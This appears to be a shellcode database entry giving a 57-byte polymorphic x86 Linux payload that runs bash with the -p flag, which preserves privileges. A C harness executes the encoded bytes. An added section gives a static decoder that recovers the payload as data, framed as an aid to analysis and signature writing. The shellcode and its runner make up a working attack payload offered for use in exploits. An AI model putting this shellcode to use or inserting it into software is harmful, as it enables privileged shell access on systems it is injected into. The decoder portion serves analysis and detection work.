
# Title : Linux x86 - polymorphic execve("/bin/bash","-p",NULL) - 57 bytes
# Published : 2010-05-05
# Author : Jonathan Salwan


/*

Title: 	Linux x86 - polymorphic execve("/bin/bash", ["/bin/bash", "-p"], NULL) - 57 bytes
Author:	Jonathan Salwan
Mail:	submit@shell-storm.org
Web:	http://www.shell-storm.org

!Database of Shellcodes http://www.shell-storm.org/shellcode/


sh sets (euid, egid) to (uid, gid) if -p not supplied and uid < 100
Read more: http://www.faqs.org/faqs/unix-faq/shell/bash/#ixzz0mzPmJC49

Based on http://www.shell-storm.org/shellcode/files/shellcode-606.php
*/

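#include <stdio.h>
#include <string.h>

/*
 * Bytes 0-23:  decoder stub (jmp/call/pop, then a loop that subtracts 1
 *              from each of the 0x21 bytes that follow).
 * Bytes 24-56: the 33-byte execve payload, each byte incremented by 1.
 */
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x21\x80"
		   "\x6c\x0e\xff\x01\x80\xe9\x01\x75"
		   "\xf6\xeb\x05\xe8\xea\xff\xff\xff"
		   "\x6b\x0c\x59\x9a\x53\x67\x69\x2e"
		   "\x71\x8a\xe2\x53\x6b\x69\x69\x30"
		   "\x63\x62\x74\x69\x30\x63\x6a\x6f"
		   "\x8a\xe4\x53\x52\x54\x8a\xe2\xce"
		   "\x81";

int main(int argc, char *argv[])
{
	/* Report the byte count (57), then transfer control to the array. */
	fprintf(stdout, "Length: %zu\n", strlen(shellcode));
	(*(void(*)()) shellcode)();
	return 0;
}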
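
Added example (not part of the original submission or the author's code): a static decoder that treats the 57 bytes above purely as data, reads the loop count and subtraction key out of the stub, and recovers the encoded body without executing anything. It shows that the stub itself stays constant and the encoding is trivially reversible, which is what analysis and signatures can key on. The function names and the three byte patterns it matches are assumptions derived from this one blob.

```c
#include <stdio.h>
#include <string.h>

/* The 57 bytes listed on this page, handled purely as data (never executed). */
static const unsigned char blob[] =
    "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75"
    "\xf6\xeb\x05\xe8\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67\x69\x2e"
    "\x71\x8a\xe2\x53\x6b\x69\x69\x30\x63\x62\x74\x69\x30\x63\x6a\x6f"
    "\x8a\xe4\x53\x52\x54\x8a\xe2\xce\x81";
#define BLOB_LEN (sizeof blob - 1)   /* drop the string literal's NUL */

/* Offset of the first match of pat in b, or -1. */
static long find(const unsigned char *b, size_t n, const unsigned char *pat, size_t m)
{
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(b + i, pat, m) == 0)
            return (long)i;
    return -1;
}

/* Statically undo the decoder loop. Returns the decoded length, or -1 when
 * the stub shape is not recognised or the buffer is too short. */
long decode_stub(const unsigned char *b, size_t n, unsigned char *out, size_t cap)
{
    static const unsigned char cnt[] = { 0x31, 0xc9, 0xb1 };       /* xor ecx,ecx; mov cl,imm8 */
    static const unsigned char sub[] = { 0x80, 0x6c, 0x0e, 0xff }; /* sub byte [esi+ecx-1],imm8 */
    long c = find(b, n, cnt, sizeof cnt);
    long s = find(b, n, sub, sizeof sub);
    if (c < 0 || s < 0 || (size_t)c + 3 >= n || (size_t)s + 4 >= n)
        return -1;
    size_t count = b[c + 3], key = b[s + 4], off = 0;
    /* A backward call rel32 (e8 xx ff ff ff) pushes the address of the body. */
    for (size_t i = (size_t)s; i + 5 <= n; i++)
        if (b[i] == 0xe8 && b[i + 2] == 0xff && b[i + 3] == 0xff && b[i + 4] == 0xff) {
            off = i + 5;
            break;
        }
    if (off == 0 || off + count > n || count > cap)
        return -1;
    for (size_t i = 0; i < count; i++)
        out[i] = (unsigned char)(b[off + i] - key);
    return (long)count;
}

int main(void)
{
    unsigned char out[256];
    long n = decode_stub(blob, BLOB_LEN, out, sizeof out);
    if (n < 0) { puts("stub not recognised"); return 1; }
    for (long i = 0; i < n; i++)
        printf("%02x%c", out[i], i + 1 == n ? '\n' : ' ');
    return 0;
}
```

The recovered 33 bytes contain the plaintext "/bin", "/bas" and "-p" pushes and end in `cd 80` (`int 0x80`), so a scanner that applies the inverse transform sees the same content as the unencoded 33-byte variant.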